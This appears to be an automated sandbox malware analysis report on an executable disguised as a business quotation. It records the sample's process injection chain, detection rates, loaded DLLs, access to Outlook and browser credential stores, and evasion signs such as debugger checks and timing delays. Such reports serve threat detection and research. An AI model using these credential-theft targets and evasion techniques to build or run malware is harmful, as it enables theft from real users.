Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1944335007.0000000002E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PTT Group project - Quotation.exe ReversingLabs: Detection: 36%
Source: PTT Group project - Quotation.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\PTT Group project - Quotation.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe" Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: PTT Group project - Quotation.exe Static file information: File size 1176576 > 1048576
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PTT Group project - Quotation.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682080075.000000000069E000.00000002.00000001.01000000.00000004.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000000.1834850249.000000000069E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source: PTT Group project - Quotation.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PTT Group project - Quotation.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PTT Group project - Quotation.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PTT Group project - Quotation.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PTT Group project - Quotation.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0098C304 LoadLibraryA,GetProcAddress, 0_2_0098C304
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00978719 push FFFFFF8Bh; iretd 0_2_0097871B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093E94F push edi; ret 0_2_0093E951
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093EA68 push esi; ret 0_2_0093EA6A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00938B85 push ecx; ret 0_2_00938B98
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093EC43 push esi; ret 0_2_0093EC45
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093ED2C push edi; ret 0_2_0093ED2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040A85A push cs; iretd 1_2_0040A85B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411888 push ecx; ret 1_2_00411891
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403106 push es; iretd 1_2_00403107
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004231A3 push esi; retf 1_2_004231AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004163CC push ebx; iretd 1_2_0041643F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004013D0 pushad ; retn E4ABh 1_2_004014A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403390 push eax; ret 1_2_00403392
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401BAC pushad ; ret 1_2_00401C26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413C1B push es; retf 1_2_00413C22
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401C2D pushad ; ret 1_2_00401C26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417C99 push esp; iretd 1_2_00417CA6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004145A1 push es; iretd 1_2_004145AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040A6E8 pushfd ; iretd 1_2_0040A702
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00405775 push edx; iretd 1_2_00405744
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004187D5 pushfd ; ret 1_2_004187DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0380225F pushad ; ret 1_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038027FA pushad ; ret 1_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx 1_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0380283D push eax; iretd 1_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03801368 push eax; iretd 1_2_03801369
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0334225F pushad ; ret 3_2_033427F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033427FA pushad ; ret 3_2_033427F9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033709AD push ecx; mov dword ptr [esp], ecx 3_2_033709B6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0334283D push eax; iretd 3_2_03342858
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029A23E2 push edx; iretd 3_2_029A23B1
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00914A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00914A35
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_009955FD
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_009333C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe API/Special instruction interceptor: Address: 873254
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Window / User API: threadDelayed 3252 Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Window / User API: threadDelayed 6721 Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668 Thread sleep count: 3252 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668 Thread sleep time: -6504000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668 Thread sleep count: 6721 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 3668 Thread sleep time: -13442000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044 Thread sleep time: -75000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe TID: 6044 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00974696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00974696
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0097C9C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097C93C FindFirstFileW,FindClose, 0_2_0097C93C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0097F200
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0097F35D
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0097F65E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00973A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00973A2B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00973D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00973D4E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0097BF27
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029BBBE0 FindFirstFileW,FindNextFileW,FindClose, 3_2_029BBBE0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00914AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00914AFE
Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088199060.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2054458383.0000016C122DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004175B3 LdrLoadDll, 1_2_004175B3
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009841FD BlockInput, 0_2_009841FD
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00913B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00913B4C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00945CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00945CCC
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0098C304 LoadLibraryA,GetProcAddress, 0_2_0098C304
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_008734C0 mov eax, dword ptr fs:[00000030h] 0_2_008734C0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00873520 mov eax, dword ptr fs:[00000030h] 0_2_00873520
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00871E70 mov eax, dword ptr fs:[00000030h] 0_2_00871E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h] 1_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
